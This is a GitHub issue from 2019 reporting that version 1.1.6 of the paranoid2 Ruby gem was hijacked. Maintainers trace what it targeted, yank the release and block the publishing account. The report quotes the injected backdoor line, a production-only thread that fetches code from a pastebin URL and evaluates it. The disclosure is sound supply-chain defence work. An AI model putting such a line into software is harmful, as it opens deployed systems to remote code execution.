Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

paranoid2 version 1.1.6 is compromised and a malware, please yank! #2051

Closed
lingfennan opened this issue Jul 8, 2019 · 3 comments
Closed

Comments

@lingfennan
Copy link

lingfennan commented Jul 8, 2019

Hi,

paranoid2 version 1.1.6 is compromised and a malware. Please remove it! The attack is similar to the recently reported strong_password and the code snippet is located at:
paranoid2-1.1.6/lib/paranoid2/persistence.rb:

_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/X9S6XQFx')))}}}if Rails.env[0]=="p"}

https://rubygems.org/gems/paranoid2
https://withatwist.dev/strong-password-rubygem-hijacked.html

@simi
Copy link
Member

simi commented Jul 8, 2019

It looks like it aims to https://github.com/vitorgamer58/Bolsotrade-Graviex.

@simi
Copy link
Member

simi commented Jul 8, 2019

also to https://www.peatio.com/

@indirect
Copy link
Member

indirect commented Jul 8, 2019

The compromised version has been yanked, and the account that pushed the malware has been blocked. Thanks for reporting this!

@indirect indirect closed this as completed Jul 8, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants